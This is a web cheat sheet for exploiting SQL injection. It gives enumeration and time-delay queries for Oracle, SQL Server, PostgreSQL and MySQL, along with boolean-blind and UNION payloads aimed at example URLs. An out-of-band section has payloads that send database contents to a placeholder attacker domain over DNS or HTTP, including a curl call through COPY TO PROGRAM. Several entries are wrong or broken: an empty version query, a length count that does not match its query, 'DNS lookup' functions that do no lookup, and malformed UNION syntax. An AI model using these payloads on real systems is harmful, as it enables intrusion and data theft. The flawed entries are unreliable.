What is SQL Injection?

SQL Injection is a type of vulnerability that occurs in an application's database when an attacker can insert or "inject" SQL commands into a query. This can allow the attacker to view, manipulate, or delete data in the database. This vulnerability usually happens when an application doesn't properly validate input before passing it into an SQL query.

What is SQL Injection Cheat Sheet?

SQL Injection Cheat Sheet is a resource that provides a compiled set of techniques, examples, and tips on how to exploit SQL Injection vulnerabilities. It is used by both ethical hackers and malicious attackers to understand potential vulnerabilities in an application's database and how they can be exploited.

Detection: Characters that can break a query

‘
“
‘)
‘))
“))
/
;
//

Table of Contents

• Oracle

• PostgreSQL

• Microsoft

• MySQL

Oracle SQL Injection

Version:

SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;

Comment

SELECT 1 FROM users -- comment

List Users

SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv

List Current Database

SELECT name FROM v$database;
SELECT instance_name FROM v$instance;

List Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'your_table_name';
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘your_schema_name’;

List Tables

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;

String Concatenation

SELECT 'Hello ' || 'World' AS concatenated_string FROM dual;
SELECT first_name || ' ' || last_name AS full_name FROM employees;

Time Delay

BEGIN dbms_lock.sleep(5); END;
-- Pause execution for 5 seconds
dbms_pipe.receive_message(('Hello World'),8)

Conditional Time Delays

BEGIN

dbms_lock.sleep(CASE WHEN some_condition THEN 5 ELSE 0 END);
dbms_output.put_line('Action after conditional delay');
END;

DNS Lookup

SELECT UTL_INADDR.get_host_address(‘microsoft.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘<http://microsoft.com>’) FROM dual;

Microsoft SQL Injection

Version

SELECT 

Comment

SELECT column1, column2
FROM table_name
WHERE condition; -- This is a single-line comment
/*comment*/  --multiple line comment

List Users

SELECT name
FROM sys.server_principals
WHERE type_desc = 'SQL_LOGIN';

List Current Database

SELECT DB_NAME() AS CurrentDatabase;

List Column

SELECT COLUMN_NAME
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'your_table_name';

List Table

SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';

String Concatenation

SELECT 'Hello ' + 'World' AS concatenated_string;
SELECT first_name + ' ' + last_name AS full_name
FROM employees;

Time Delay

WAITFOR DELAY '00:00:05'; -- Always pause for 5 seconds

Conditional Time Delays

IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'

DNS Lookup

declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')

PostgreSQL Injection

Version

SELECT version();

Comment

--comment

List Users

SELECT usename FROM pg_user;

List Current Database

SELECT current_database();

List Column

SELECT column_name
FROM information_schema.columns
WHERE table_name = 'your_table_name';

List Table

SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public' AND table_type = 'BASE TABLE';

String Concatenation

SELECT 'Hello ' || 'World' AS concatenated_string;

Time Delay

SELECT pg_sleep(5);

Conditional Time Delays

SELECT CASE
WHEN some_condition THEN pg_sleep(5)
ELSE pg_sleep(0)
END;

DNS Lookup

SELECT host('[example.com](<http://example.com/>)'::inet);

MySQL Injection

Version

SELECT VERSION();

Comment

-- comment

List Users

SELECT user FROM mysql.user;

List Current Database

SELECT DATABASE();

List Column

SELECT column_name
FROM information_schema.columns
WHERE table_name = 'your_table_name';

List Table

SHOW TABLES;

String Concatenation

SELECT CONCAT('Hello ', 'World') AS concatenated_string;

Time Delay

SELECT SLEEP(5);

Conditional Time Delays

SELECT CASE
WHEN some_condition THEN SLEEP(5)
ELSE SLEEP(0)
END;

DNS Lookup

SELECT INET_ATON('[example.com](<http://example.com/>)');

Boolean Based Blind SQLi

Blind SQL Injection is an attack that asks true or false questions to a database, interpreting the application's response to retrieve data bit by bit. It's often used when the application shows generic error messages but is still vulnerable to SQL injection.

Retrieving Database

The given query will verify if database has 14 characters.

http://example.com/index.php?id=1' AND (length(database())) = 17 --+

Retrieving Database Name

http://example.com/index.php?id=1' AND (ascii(substr((select database()),1,1))) > 105 --+

If the website doesn't fully load, it indicates that the condition is incorrect. Keep trying with different ASCII values until you obtain the database name.

Retrieving Table Length

' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 4 --+

Retrieving name of table name

' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 108 --+

Retrieving Column Length

This query will test for string length is equal to 7 or not:

' AND (length((select username from users limit 0,1))) = 7 --+

Retrieving Column Name

This query will test if the first character of the first column name is ascii 101 (e):

' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 101 --+

Union SQL Injection Attack

Union SQL Injection is a type of SQL Injection attack which uses the UNION SQL operator to combine the results of the original query with results from injected malicious SQL statements. This allows an attacker to extract information from the database. The attacker can use this technique to retrieve data from different database tables that would not normally be accessible through the application.

Identify Number of Columns - ORDER BY clause

http://example.com/index.php?id=1' order by 1-- -

Keep incrementing the number until you get an error indicating that there aren't more columns than the given number.

For example:

http://example.com/index.php?id=1' order by 2-- -

http://example.com/index.php?id=1' order by 3-- -

http://example.com/index.php?id=1' order by 4-- -

Identify column that stores “String”

http://example.com/index.php?id=1' Union Select 'a', null, null, null from dual-- -

If the response contains the string 'a', it indicates that the column correctly reflects our data. If it doesn't, continue trying until you receive the reflected string.

http://example.com/index.php?id=1' Union Select null, 'a', null, null from dual-- -

http://example.com/index.php?id=1' Union Select null, null, 'a', null from dual-- -

http://example.com/index.php?id=1' Union Select null, null, null, 'a' from dual-- -

Once you know which column is reflecting data, try to identify which database it is using through thus query

http://example.com/index.php?id=1' Union Select '1', '2', '3', select version(); from dual-- -

The given SQL injection query will work on MySQL, Microsoft SQL Server, and PostgreSQL databases, as these databases support the UNION SELECT command and the version() function.

If you want to retrieve more information, simply modify the statements in the column.

Out of Band SQLi for different databases

Out of Band SQLi (SQL Injection) is a type of SQL Injection attack where the attacker is able to retrieve data via non-traditional channels, such as DNS or HTTP requests. This method is usually used when the server responses are not very verbose, making it hard to extract data. In essence, Out of Band SQLi takes advantage of the server's ability to make DNS or HTTP requests to deliver data to the attacker.

MySQL

DNS Exfiltration:

SELECT load_file(CONCAT('\\\\\\\\\\\\\\\\', (SELECT column_name FROM table_name), '.yourdomain.com\\\\\\\\\\\\\\\\'));

HTTP(S) Request Exfiltration:

SELECT load_file(CONCAT('<https://yourdomain.com/>', (SELECT column_name FROM table_name)));

Microsoft SQL Server

DNS Exfiltration:

EXEC('master..xp_dirtree "//'+(SELECT column_name FROM table_name)+'.yourdomain.com/a"')

HTTP(S) Request Exfiltration: Unfortunately, Microsoft SQL Server does not readily support HTTP(S) request exfiltration.

PostgreSQL

DNS Exfiltration: Unfortunately, PostgreSQL does not readily support DNS exfiltration.

COPY (SELECT column_name FROM table_name) TO PROGRAM 'curl "<https://yourdomain.com/>"';

Oracle

DNS Exfiltration:

SELECT UTL_INADDR.get_host_address((SELECT column_name FROM table_name)||'.yourdomain.com') FROM dual;

HTTP(S) Request Exfiltration:

SELECT UTL_HTTP.REQUEST('<https://yourdomain.com/'||>(SELECT column_name FROM table_name)) FROM dual;